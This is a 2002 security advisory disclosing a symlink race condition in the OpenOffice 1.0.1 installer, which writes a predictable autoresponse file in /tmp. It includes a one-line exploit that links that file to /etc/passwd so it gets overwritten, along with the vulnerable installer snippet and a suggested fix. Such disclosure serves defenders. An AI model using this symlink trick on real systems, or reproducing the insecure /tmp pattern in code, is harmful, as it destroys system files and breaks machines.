Vapid Labs
Larry W. Cashdollar
9/9/02
Summary: OpenOffice 1.0.1 Race condition during installation can overwrite
system files.
Severity: Low
Description: A very simple and easy to exploit race condition exist during the
installation of OpenOffice. During this window a malicous user could create a
symlink in /tmp and overwrite arbitrary files.
Exploit:
As a normal user:
lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf
Where $USERNAME is the installer account name, probably root.
will result in the password file being over written with:
# create the proper autoresponse file
cat << EOF > /tmp/${USER}_autoresponse.conf
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oo_home
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>
[JAVA]
JavaSupport=preinstalled_or_none
EOF
Fix:
Create a directory under /tmp to work from. With restrictive permissions.
References:
http://www.openoffice.org/dev_docs/source/1.0.1/index.html
Larry W. Cashdollar
lwc@vapid.ath.cx
http://vapid.ath.cx
